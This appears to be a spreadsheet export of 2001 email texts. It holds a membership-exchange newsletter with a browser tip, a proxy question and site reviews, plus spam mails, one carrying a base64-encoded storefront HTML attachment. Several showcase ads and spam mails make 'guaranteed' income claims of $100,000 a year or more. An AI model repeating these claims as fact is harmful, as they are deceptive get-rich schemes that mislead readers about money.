disable the Image Toolbar forthis session or forever. If you want to re-establishthe Image Toolbar just go to the Internet OptionsControl Panel and you can turn the Image Toolbar back on.Remember, a right mouse click over any Windows Icon,Window, tool bar, the Desktop, and most other Windowsentities will list loads of information. Use it, getthe hang of it, you'll like it.Peter A. Steeves, B.Sc., M.Sc., Ph.D., P.Eng.Geomatics EngineerGeodetic Software SystemsLogical@idirect.comhttp://www.GSSGeomatics.com______________________________________________________&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; QUESTIONS &amp; ANSWERS &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;Subject: Unblocking sites so I can access?I am currently living in a place where the ISP is blocking 50% of the web.I was told by someone that you can unblock these web sites by usinga proxy, but I don't know what that means. I am wondering is there away to get access to these sites?CJcj5000@post.com______________________________________________________&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt; WEBSITE SHOWCASES &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&gt;&gt;&gt;&gt;&gt;&gt; MEMBER *REVIEWS* &lt;&lt;&lt;&lt;&lt;&lt;&lt;click here to edit your preferences, or copy the following URL into your browser: 
--646007810.993513231406.JavaMail.RovAdmin.rovweb002
Content-Type: text/html; charset=iso-8859-1 Your Membership Exchange, Issue #422______________________________________________________YourMembership Exchangeï¿½Issue#422ï¿½ï¿½ &lt;&gt;ï¿½ï¿½ 06-25-01Yourplace to exchange ideas, ask questions, swap links, and share your skills!____________________________________________________________________________________________________________Youare a member in at least one of these programs - You should be in them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Special Announcement:Wecan help you become an Internet Service provider within 7 daysorwe will give you $100.00!!ï¿½ï¿½ http://www.SELLinternetACCESS.comclick hereWehave already signed 300 ISPs on a 4 year contract, see if anyarein YOUR town at:ï¿½ http://www.Find-Local-ISP.com clickhere____________________________________________________________________________________________________________Besure to examing today's Showcases for sites who WILL trade links with you!&gt;&gt;RESOURCE BOARDï¿½ï¿½ï¿½ï¿½P. Steeves: Internet Explorer Hint w/ "Image Toolbar"&gt;&gt;Q &amp; Aï¿½ï¿½ï¿½ï¿½QUESTIONS:ï¿½ï¿½ï¿½ï¿½ï¿½- Unblocking sites so I can access?&gt;&gt;MEMBER SHOWCASES&gt;&gt;MEMBER *REVIEWS*ï¿½ï¿½ï¿½ï¿½- Sites to Review: #122 &amp; #123!ï¿½ï¿½ï¿½ï¿½- Three New Sites to Review!ï¿½ï¿½ï¿½ï¿½- Site #121 Reviewed!ï¿½ï¿½ï¿½ï¿½- Vote on Your Favorite Website Design!______________________________________________________ï¿½&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;RESOURCE BOARD &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;Haveyou found a way to make your life online a little easier?Anew software program you can't live without, a tip that solvesoneof those annoying problems? Share it!Besure to include your signature file so you get credit (and exposuretoyour site). -- But NO self promotion or affiliate program links! --mailto:MyInput@AEOpublishing.com++++Resource Post #1 ++++From:Peter A Steeves Subject:Internet Explorer Hint w/ "Image Toolbar"Iupdated to Internet Explorer Version: 6.00.2462.0000 a fewweeksago. I am now receiving less BOMBS when I am on-line;therefore,I believe it is better than the last version.Thereis, though, one little agonizing message "Image Toolbar"thatpops up every time you pass the mouse over an image.Itasks whether you want to save or print the image. UGH,whata pest.Hurrah,you can get rid of the Image Toolbar. Justperforma Right Mouse Click over the Image Toolbar.Itwill allow you to disable the Image Toolbar forthissession or forever. If you want to re-establishtheImage Toolbar just go to the Internet OptionsControlPanel and you can turn the Image Toolbar back on.Remember,a right mouse click over any Windows Icon,Window,tool bar, the Desktop, and most other Windowsentitieswill list loads of information. Use it, getthehang of it, you'll like it.PeterA. Steeves, B.Sc., M.Sc., Ph.D., P.Eng.GeomaticsEngineerGeodeticSoftware SystemsLogical@idirect.comhttp://www.GSSGeomatics.com______________________________________________________ï¿½&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;QUESTIONS &amp; ANSWERS &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;Doyou a burning question about promoting your website, html design,oranything that is hindering your online success? Submit your questionstomailto:MyInput@AEOpublishing.comAreyou net savvy? Have you learned from your own trials and errors andarewilling to share your experience? Look over the questions each day,andif you have an answer or can provide help, post your answer tomailto:MyInput@AEOpublishing.comï¿½ï¿½Be sure to include your signaturefileso you get credit (and exposure to your site).QUESTIONS:From:CJï¿½ Subject:Unblocking sites so I can access?Iam currently living in a place where the ISP is blocking 50% of the web.Iwas told by someone that you can unblock these web sites by usingaproxy, but I don't know what that means. I am wondering is there awayto get access to these sites?CJcj5000@post.com______________________________________________________ï¿½&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;WEBSITE SHOWCASES &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;Examinecarefully - those with email addresses included WILLtradelinks with you, you are encouraged to contact them. And, therearemany ways to build a successful business. Just look at thesesuccessfulsites/programs other members are involved in...-----------------------------------------------------EARN$100,000+ PER YEAR! - FULLY GUARANTEED!Wedo all the selling for you, 365 days a year! We alsoofferyou a GUARANTEED INCOME of up to $100,000+p.a.-working just 2 hours a day. GUARANTEEDhttp://www.ArmchairTycoon.com/profits2youTradeLinks - walter@profits2you.com-----------------------------------------------------CashPOis Paid E-Mail Central!GetFREE REFERRALS, _KEEP_ referrals when new programsareadded; free advertising to other members, and soon chancestowin cash! http://www.cashpo.net/CashPO/openpage.php4?c=2------------------------------------------------------VisitWard's Gift Shop!Hereyou can find all your shopping needs on line, and good qualityproducts;Everyday low prices! We have Dolls, Angels, Novelties,andso much much more to choose from. Go to our site, and getyourFree Catalog today; over 3,000 Products to choose from.http://www.wardsgiftshop.comTrade Links - bjw123@freeonline.com-----------------------------------------------------AttentionAll Web Marketers-$30k-$100k CASH This YearNoexperience needed, No product to sell. The real go getterscanmake $100,000.00 CASH,in their first month This is verypowerful,contact me TODAY ycon@home.com orgoto:http://www.makecashonline.comGET EXCITED :)TradeLinks - ycon@home.com-----------------------------------------------------RETIREQUICKLY --FreeReport "Seven Secrets to Earning $100,000 from Home".FullyAutomated Home Business. 81% commissions-IncomeUNLIMITED.Automated Sales, Recruiting and Training MACHINE.JoinNOW! http://orleantraders.4yoursuccess.orgTradeLinks - bgmlm@4yoursuccess.org-----------------------------------------------------Ifyou have a product, service, opportunity and/or quality merchandisethatappeals to people worldwide, reach your target audience!Fora fraction of what other large newsletters charge youcanexhibit your website here for only $8 CPM. Why?...Becauseas a valuable member we want you to be successful!Ordertoday - Exhibits are limited and published on afirstcome, first serve basis. http://bannersgomlm.com/ezine______________________________________________________ï¿½&gt;&gt;&gt;&gt;&gt;&gt;&gt;MEMBER *REVIEWS* &lt;&lt;&lt;&lt;&lt;&lt;&lt;&lt;Visitthese sites, look for what you like and any suggestionsyoucan offer, and send your critique to MyInput@AEOpublishing.comAnd,after reviewing three sites, your web site will be added tothelist! It's fun, easy, and it's a great opportunity to givesomehelp and receive an informative review of your own site.Plus,you can also win a chance to have your site chosen forafree website redesign.ï¿½ One randomly drawn winner each month!SITESTO REVIEW:Site#122: http://www.newlinepubs.comGlennGehrkemagician@foxinternet.netSite#123: http://netsbestinfo.homestead.com/nbi.htmlDennisdamorganjr@yahoo.comSite#124: http://www.BestWayToShop.comDalePikerhinopez@aol.comSite#125: http://www.wedeliverparties.comDawnClemonsdclemons7@home.comSite#126: http://www.EClassifiedshq.comCarolCohenOpp0rtunity@aol.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~SITEREVIEWEDCommentson #121: http://www.angelfire.com/fl3/mrstgiftsSite#121: http://www.angelfire.com/fl3/mrstgiftsShirleyTuretskyinteractiveopinions@email.com~~~~Iguess this is just a fun site where someone is experimenting with a lotof webtechniques.It is a bit slow loading as would be the case with so much animation.Iguess it will always be slow with all that. I do not like pop up pagesand therewasone that kept doing that. Some of the pages were really pretty but theanimationdid not fit the mood of the page. A tremendous amout of work hasbeenput into the page. There are so many places to host websites inexpensively,whydon't you have your own domain? You ought to check into that.~~~~Thisis a very lovely site, the graphics are awesome and the games are funaswell. You may want to look into purchasing your own domain name andahost that offers bannerless hosting (at least without the pop-ups).~~~~Hmm...too much input! There's way too much loading on this page. I don'tlikethe wav file loading and though I didn't here anything windows promptedmefor a MP3 decoder, so I presume one of those was loading as well. Someofthe links are pretty cool but perhaps the main menu should be also textbasedor smaller gifs and put on the index page. For a minute I didn't knowwhereto go.~~~~Thiswas a neat site.ï¿½ The site was original and I could tell that Mrs.T certainlyseemsto enjoy working on her site.ï¿½ The graphics were pretty, or funny,dependingon each one, but well arranged. But, the text on the home pagewasgoing from the left side to the right side with no margins so it overlappedtheleft rose border. I'd suggest moving the margins in a little bit.ï¿½Also, I thinkusinga sans-serif font like arial would be easier to read, though I did likehowthefont color matched the flowers. BTW, I was viewing the site with internetexplorer.Idon't think you need the 'welcome' on both the home page and the site guidepage,it's overkill. I also didn't figure out the association between mrstgifts,interactiveopinions, and a site on graphics. Relating the name of your site tothesite content helps when new visitors visit.Onyour home page you say something about trying to design your own graphics.Ifyou do so, try starting with a logo for your site. I realize you are showingdifferentpictures and styles, but it would be nice to have a logo or the samepictureon each page so it's easy to tell I'm still visiting the same website.Onyourarticles page it was hard to see the titles by the earth graphics becauseofthe background colors. Maybe putting them in a table with the backgroundbehindthat would work better.Lookfor a host that doesn't use pop-ups - I would have checked out morepagesbut I hated getting those pop-ups each time I clicked to a new page.Iwent to your articles site and that was at homestead - that bar is mucheasiertodeal with than the pop-ups. I'd suggest moving your whole site there.~~~~Thisis an interesting site - it covers a large variety of subjects - not allof whichIvisited - and it has something for every member of the family, however,mostofit is for either mothers or the kids. She even has some games to play -goodforsmaller kids, too! Mrs. T., as she is known, is quite creative - and Iwouldrecommendthis site for the whole family.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~VOTEON YOUR FAVORITE WEBSITE DESIGN!Helpout the winner of the free website redesign by voting forYOURfavorite!Youcan help out Teddy at http://www.links4profit.comby taking alookat his site, then checking out the three new layouts Jana ofAkkaBayDesigns http://AkkaBay.com has designedspecificallyforhim.ï¿½ After you've visited all three, vote for your favorite.Tomake this as easy as possible for you, just click on the e-mailaddressthat matches your choice - you do not need to enteranyinformation in the subject or body of the message.Ihave included a note from Jana, and the links to Teddy'scurrentsite along with the three new designs:FromJana: The pages have been created as non-frame pagesalthoughwith minor modification, the pages could be adaptedforuse in a frames environmentPleasetake a look at the existing site: http://www.links4profit.comHereare the 3 redesigns:http://AkkaBay.com/links4profit/index.htmlVotefor this design:ï¿½ mailto:design1@AEOpublishing.comhttp://AkkaBay.com/links4profit/index2.htmlVotefor this design:ï¿½ mailto:design2@AEOpublishing.comhttp://AkkaBay.com/links4profit/index3.htmlVotefor this design:ï¿½ mailto:design3@AEOpublishing.comYouwill have all of this week to vote (through June 29), andwe'lllist the favorite and most voted for layout next week.Teddyof course will be able to choose his favorite, andcolors,font style/size, backgrounds, textures, etc, can alleasilybe changed on the "layout" that they like.Freewebsite re-designs and original graphics are provided toRedesignwinners courtesy of AkkaBay Designs. http://AkkaBay.comIfyou have any questions about how this works or how you canparticipate,please email Amy at Moderator@AEOpublishing.com______________________________________________________moderator:Amy Mosselposting:ï¿½MyInput@AEOpublishing.com____________________________________________________________________________________________________________Sendposts and questions (or your answers) to:ï¿½ï¿½mailto:MyInput@AEOpublishing.comPleasesend suggestions and comments to:ï¿½ï¿½mailto:Moderator@AEOpublishing.comTochange your subscribed address, send both newandold address to mailto:Moderator@AEOpublishing.comSeebelow for unsubscribe instructions.Copyright2001 AEOpublishing-----End of Your Membership Exchangeï¿½ï¿½Visit our Subscription Center to edit your interests or unsubscribe.View our privacy policy.This email was sent to those who signed up for it.  If you believe it has reached you in error, or you are no longer interested in receiving it, then please click here to edit your preferences, or copy the following URL into your browser: 
--646007810.993513231406.JavaMail.RovAdmin.rovweb002--</t>
  </si>
  <si>
    <t xml:space="preserve">
There Are Only A Few Things Needed to Be Successful:You need a multi-billion dollar, ground floor opportunity with the most 
sought after product in an untapped market that has people clearing $60,000 
their first month and $20,000 per week after 8 weeks. You need full support 
from the start so your growth potential is unlimited.
Click here for your FREE special report.http://www.18w6j3g4wrr5s.com/user2/index.htm
To Be Remove From Further Mailings reply to http://www.18w6j3g4wrr5s.com/remove/ with remove in the subject line.. 
</t>
  </si>
  <si>
    <t xml:space="preserve">
This is a multipart MIME message.--= Multipart Boundary 0626010800
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
           to remove your address per--fed.--law
           print remove in subject line to-----------
           route69@biker.com--= Multipart Boundary 0626010800
Content-Type: application/octet-stream;
	name="bill redmond sports store.htm"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
	filename="bill redmond sports store.htm"PCEtLSBCdWxsc2V5ZSBjb2RlIC0tPg0NCjxodG1sPg0NCjxoZWFkPg0NCiAg
PHRpdGxlPkJJTEwgUkVETU9ORCBTUE9SVFM6IEZyb20gVGVhbSBTcG9ydHMg
VG8gQmFja3lhcmQgRnVuPC90aXRsZT4NDQogIDxNRVRBIG5hbWU9ImRlc2Ny
aXB0aW9uIiBjb250ZW50PSJQb3dlcmVkIGJ5IFZzdG9yZSI+DQ0KICA8TUVU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DQo8dHI+DQ0KICA8dGQgdmFsaWduPXRvcCBhbGlnbj1yaWdodCB3aWR0aD0x
Mzc+PGltZyBzcmM9Ii92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9y
dHMvaW1hZ2VzL2Nvcm5lcmdyYXBoaWMuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0
PTE1NiBib3JkZXI9MD48L3RkPg0NCiAgPHRkIHZhbGlnbj10b3Agd2lkdGg9
NDgzPg0NCiAgPHRhYmxlIGJvcmRlcj0wIGNlbGxwYWRkaW5nPTAgY2VsbHNw
YWNpbmc9MCB3aWR0aD00ODM+DQ0KICA8dHI+DQ0KICAJPHRkIHdpZHRoPTM4
NT48aW1nIHNyYz0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC90b3BiYXIuZ2lm
IiB3aWR0aD0iMzI5IiBoZWlnaHQ9IjIxIiBib3JkZXI9MD48YnI+DQ0KPGlt
ZyBzcmM9Ii9pbWFnZXMvc3BjbGVhci5naWYiIHdpZHRoPTI1IGhlaWdodD0x
MSBoc3BhY2U9MCB2c3BhY2U9MCBib3JkZXI9MCBhbGlnbj1sZWZ0IGFsdD0i
Ij4NDQo8YSBocmVmPSJodHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9w
YWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdl
Lmh0bWw/bW9kZT1ob21lJmZpbGU9L3BhZ2UvaG9tZS9ob21lLnNwbCI+DQ0K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ZT0wIGJvcmRlcj0wIGFsaWduPWxlZnQgYWx0PSJZb3VyIEFjY291bnQiPjwv
YT4NDQo8aW1nIHNyYz0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC90b3BuYXZf
ZGl2aWRlci5naWYiIHdpZHRoPTEgaGVpZ2h0PTExIGJvcmRlcj0wIGFsaWdu
PWxlZnQgYWx0PSIiPg0NCjxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNv
bS9jZ2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxl
c3BvcnRzL3BhZ2UuaHRtbD9tb2RlPWhlbHAmZmlsZT0vcGFnZS9oZWxwL2hl
bHAyLnNwbCI+DQ0KPGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgv
dG9wbmF2X2hlbHAuZ2lmIiBoZWlnaHQ9MTEgd2lkdGg9MjUgaHNwYWNlPTAg
dnNwYWNlPTAgYm9yZGVyPTAgYWxpZ249bGVmdCBhbHQ9IkhlbHAiPjwvYT4N
DQo8L3RkPg0NCgkgIDx0ZCB2YWxpZ249Ym90dG9tIGFsaWduPWNlbnRlciB3
aWR0aD05OD48aW1nIHNyYz0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC9zaG9w
cGluZ19jYXJ0LmdpZiIgd2lkdGg9OTUgaGVpZ2h0PTE2IGJvcmRlcj0wPjwv
dGQ+DQ0KICA8L3RyPg0NCiAgPC90YWJsZT4NDQoJPHRhYmxlIGJvcmRlcj0w
IGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MCB3aWR0aD00ODM+DQ0KICA8
dHI+DQ0KICAJPHRkIHZhbGlnbj10b3AgYWxpZ249bGVmdCB3aWR0aD0iMzg1
Ij48Zm9ybSBhY3Rpb249Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmlu
L3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3Bh
Z2UuaHRtbCIgbWV0aG9kPSJHRVQiPg0NCiAgICA8aW5wdXQgdHlwZT0iaGlk
ZGVuIiBuYW1lPSJtb2RlIiB2YWx1ZT0ic2VhcmNoIj4NDQogICAgPGlucHV0
IHR5cGU9ImhpZGRlbiIgbmFtZT0iZmlsZSIgdmFsdWU9Ii9wYWdlL3NlYXJj
aC9zZWFyY2hyZXN1bHRzLnNwbCI+DQ0KICAgIDxpbWcgc3JjPSIvdnN0b3Jl
c3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL2ltYWdlcy9oZWFkZXIuZ2lm
IiB3aWR0aD0zNzYgaGVpZ2h0PTc0IGJvcmRlcj0wPjxCUj4NDQogICAgPGRp
diBhbGlnbj1jZW50ZXI+PCEtLSBiZWdpbiBzZWFyY2ggLS0+DQ0KPHRhYmxl
IGJvcmRlcj0wIHdpZHRoPTM2MCBjZWxscGFkZGluZz0xIGNlbGxzcGFjaW5n
PTAgYmdjb2xvcj0iIzAwMzM5OSI+DQ0KPHRyPg0NCiAgPHRkIHZhbGlnbj10
b3AgYWxpZ249bGVmdD4NDQogIDx0YWJsZSBib3JkZXI9MCB3aWR0aD0iMTAw
JSIgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wIGJnY29sb3I9IiNEQ0VE
RjUiPg0NCiAgPHRyPg0NCiAgICA8dGQgd2lkdGg9NjUgYWxpZ249Y2VudGVy
PjxpbWcgc3JjPSIvaW1hZ2VzLzE2NDcvMTczMi8xNjg4L3NlYXJjaF90ZXh0
LmdpZiIgd2lkdGg9NTggaGVpZ2h0PTkgYm9yZGVyPTA+PGJyPjwvdGQ+DQ0K
ICAgIDx0ZCBhbGlnbj1sZWZ0IHdpZHRoPTEwMD48aW5wdXQgdHlwZT0idGV4
dCIgbmFtZT0iS2V5d29yZHMiIHNpemU9IjEzIj48L3RkPg0NCgkgIDx0ZCB3
aWR0aD00MCBhbGlnbj1jZW50ZXI+PGlucHV0IHR5cGU9ImltYWdlIiBzcmM9
Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvYnRuX2dvdG9zZWFyY2guZ2lmIiB3
aWR0aD0yOSBoZWlnaHQ9MjMgYm9yZGVyPTA+PGJyPjwvdGQ+DQ0KCSAgPHRk
IGFsaWduPWNlbnRlciB3aWR0aD0iMTUwIj48YSBocmVmPSJodHRwOi8vd3d3
LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxv
d3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1zZWFyY2gmZmlsZT0v
cGFnZS9zZWFyY2gvc2VhcmNoMi5zcGwiPjxpbWcgc3JjPSIvaW1hZ2VzLzE2
NDcvMTczMi8xNjg4L3NlYXJjaF9hZHZhbmNlZC5naWYiIHdpZHRoPTUyIGhl
aWdodD0xMCBib3JkZXI9MCBhbGlnbj1sZWZ0IGFsdD0iIj48L2E+PGltZyBz
cmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvc2VhcmNoX2RpdmlkZXIuZ2lm
IiB3aWR0aD0xIGhlaWdodD0xMCBib3JkZXI9MCBhbGlnbj1sZWZ0IGFsdD0i
Ij48YSBocmVmPSJodHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdl
Z2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0
bWw/bW9kZT1ob21lJmZpbGU9L3BhZ2Uvc2VhcmNoL3NlYXJjaF90aXBzLnNw
bCI+PGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvc2VhcmNoX3Rp
cHMuZ2lmIiB3aWR0aD01OSBoZWlnaHQ9MTAgYm9yZGVyPTAgYWxpZ249bGVm
dD48L2E+PC90ZD4NDQogIDwvdHI+DQ0KICA8L3RhYmxlPg0NCiAgPC90ZD4N
DQo8L3RyPg0NCjwvdGFibGU+DQ0KPCEtLSBlbmQgc2VhcmNoIC0tPg0NCjwv
ZGl2Pg0NCiAgICA8L2Zvcm0+PC90ZD4NDQoJICA8dGQgdmFsaWduPXRvcCBh
bGlnbj1jZW50ZXIgd2lkdGg9OTg+DQ0KICAgIDx0YWJsZSBib3JkZXI9MCBj
ZWxscGFkZGluZz0yIGNlbGxzcGFjaW5nPTAgYmdjb2xvcj0iIzAwMzM5OSI+
DQ0KICAgIDx0cj4NDQogICAgICA8dGQ+PGltZyBzcmM9Ii9pbWFnZXMvc3Bj
bGVhci5naWYiIHdpZHRoPTEgaGVpZ2h0PTEgYm9yZGVyPTA+PGJyPg0NCgkJ
CTx0YWJsZSBib3JkZXI9MCBjZWxscGFkZGluZz01IGNlbGxzcGFjaW5nPTAg
Ymdjb2xvcj0iI0ZGRkZGRiI+DQ0KCQkJPHRyPg0NCiAgICAgICAgPHRkIHZh
bGlnbj1taWRkbGUgYWxpZ249Y2VudGVyPjxhIGhyZWY9Imh0dHA6Ly93d3cu
dnN0b3JlLmNvbS9jZ2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93
d2hvbGVzYWxlc3BvcnRzL3BhZ2UuaHRtbD9tb2RlPW9yZGVyJmZpbGU9L3Nj
YXJ0MS9jYXJ0LnNwbCI+PGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2
ODgvY2FydF92aWV3Y2FydC5naWYiIHdpZHRoPTU5IGhlaWdodD05IGJvcmRl
cj0wPjwvYT48QlI+DQ0KCQkJCTxhIGhyZWY9Imh0dHBzOi8vd3d3LnZzdG9y
ZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xl
c2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1vcmRlciZmaWxlPS9zY2FydDEv
c2lnbmluLnNwbCI+PGltZyBzcmM9Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgv
Y2FydF9jaGVja291dC5naWYiIHdpZHRoPTU5IGhlaWdodD05IGJvcmRlcj0w
PjwvYT4NDQoJICAgICAgPGRpdiBhbGlnbj1jZW50ZXI+DQ0KCQkJCTxpbWcg
c3JjPSIvaW1hZ2VzLzE2NDcvMTczMi8xNjg4L2NhcnRfdG90YWwuZ2lmIiB3
aWR0aD0yNSBoZWlnaHQ9OCBib3JkZXI9MCBoc3BhY2U9MiB2c3BhY2U9ND48
QlI+DQ0KCQkJCTxmb250IGZhY2U9IkFyaWFsIiBzaXplPSIxIiBjb2xvcj0i
IzAwMDAwMCI+DQ0KCQkJCQ0NCgkJCQkkMC4wMDwvZm9udD48L2Rpdj4NDQoJ
CQkJPC90ZD4NDQogICAgICA8L3RyPg0NCiAgICAgIDwvdGFibGU+DQ0KICAg
ICAgPC90ZD4NDQogICAgPC90cj4NDQogICAgPC90YWJsZT4NDQogICAgPC90
ZD4NDQoJPC90cj4NDQoJPC90YWJsZT4NDQogIDwvdGQ+DQ0KICA8dGQgd2lk
dGg9IjE4MCIgYWxpZ249Y2VudGVyIHZhbGlnbj10b3A+DQ0KICA8L3RkPg0N
CjwvdHI+DQ0KPC90YWJsZT4NDQo8dGFibGUgYm9yZGVyPTAgd2lkdGg9Nzgw
IGNlbGxwYWRkaW5nPTAgY2VsbHNwYWNpbmc9MD4NDQo8dHI+DQ0KICA8dGQg
dmFsaWduPXRvcCB3aWR0aD0xMzcgcm93c3Bhbj00Pg0NCiAgPGltZyBzcmM9
Ii9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvYnJvd3NlLmdpZiIgd2lkdGg9MTM3
IGhlaWdodD0zOSBib3JkZXI9MD48QlI+DQ0KPCEtLSBiIHRvcGNhdGxpc3Qg
LS0+DQ0KPGEgaHJlZj0iaHR0cDovL3d3dy52c3RvcmUuY29tL2NnaS1iaW4v
cGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvcGFn
ZS5odG1sP21vZGU9cHJvZHVjdHMmZmlsZT0vcGFnZS9wcm9kbGlzdHY0L3By
b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzM5OCI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjMz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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzU0MiI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjM1
NDIuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzcwMCI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjM3
MDAuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzYwMyI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjM2
MDMuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0zMDI5NCI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MzAy
OTQuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yNDM5OCI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjQz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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yMzUyOCI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjM1
MjguZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yNDU2MCI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjQ1
NjAuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yNDQ5NSI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjQ0
OTUuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yNjM3OSI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5MjYz
NzkuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+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b2R1Y3RsaXN0LnNwbCZjYXRpZD0yOTk5NCI+PGltZyBzcmM9Ii92c3RvcmVz
cG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvaW1hZ2VzL2NhdGVnb3J5Mjk5
OTQuZ2lmIiB3aWR0aD0xMzcgaGVpZ2h0PTIyIGJvcmRlcj0wPjwvYT48YnI+
DQ0KPCEtLSBlIHRvcGNhdGxpc3QgLS0+DQ0KDQ0KPGEgaHJlZj1odHRwOi8v
V1dXLkJJTEwgUkVETU9ORCBTVE9SRVMuQ09NIHRhcmdldD1fdG9wPjxpbWcg
c3JjPS9pbWFnZXMvMTY0Ny8xNzMyLzE2ODgvYmFja3RvbWFpbnNpdGUuZ2lm
IHdpZHRoPTEzNyBoZWlnaHQ9MTI4IGhzcGFjZT0wIHZzcGFjZT0wIGJvcmRl
cj0wIGFsaWduPWNlbnRlcj48L2E+DQ0KICA8L3RkPg0NCiAgPHRkIHdpZHRo
